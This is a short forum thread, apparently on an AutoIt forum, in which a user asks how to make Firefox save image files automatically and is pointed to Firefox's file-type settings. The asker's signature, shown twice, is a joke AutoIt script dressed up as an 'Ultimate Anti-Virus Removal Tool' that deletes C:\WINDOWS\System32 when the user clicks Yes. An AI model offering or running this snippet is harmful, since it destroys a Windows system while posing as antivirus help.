Jump to content

Download Picture...from tab?


 Share

Recommended Posts

Ok. I download a lot of pictures on an imageboard I like but there's one thing. I would like it if Firefox could detect that it's a picture file, automatically download it (without a prompt), and close the tab. Is this possible?

Thanks!

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Link to comment
Share on other sites

Ok. I download a lot of pictures on an imageboard I like but there's one thing. I would like it if Firefox could detect that it's a picture file, automatically download it (without a prompt), and close the tab. Is this possible?

Thanks!

Go into tools -> Options -> Content -> Manage Filetypes

:D

Link to comment
Share on other sites

I knew that....just making sure you were on your toes Bert...I swear.

(thanks)

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...